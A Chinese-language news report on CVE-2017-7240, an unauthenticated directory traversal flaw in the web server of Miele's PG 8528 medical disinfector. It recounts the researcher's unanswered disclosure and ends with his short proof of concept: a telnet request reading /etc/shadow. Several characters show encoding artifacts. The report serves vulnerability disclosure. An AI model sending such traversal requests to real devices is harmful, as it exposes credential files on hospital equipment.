信息來源：hackernews

近日，德國高端家電廠商美諾（ Miele ）生產(chǎn)的 Professional PG 8528 設(shè)備被曝存在 Web 服務(wù)器目錄遍歷漏洞，允許攻擊者未經(jīng)身份驗證即可訪問 Web 服務(wù)器任何目錄，漏洞編號為 CVE-2017-7240 。

美諾 Professional PG 8528 是一款用于消毒實驗室與手術(shù)器械的醫(yī)療設(shè)備。這款設(shè)備所采用的嵌入式 Web 服務(wù)器PST10 WebServer 主要監(jiān)聽 80 端口，容易遭受目錄遍歷攻擊。非法入侵者可利用該漏洞在 Web 服務(wù)器上添加并執(zhí)行惡意代碼以訪問敏感信息。

據(jù)悉，該漏洞由在德國咨詢公司 Schneider & Wulf 任職的 Jens Regel 發(fā)現(xiàn)并曾于 2016 年 12 月向美諾提交報告。遺憾的是，對于他的此番舉動，廠商并未給予任何回應(yīng)。四個月后，他決定公開披露該漏洞的概念證明（ PoC ），希望引起廠商的足夠重視。

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.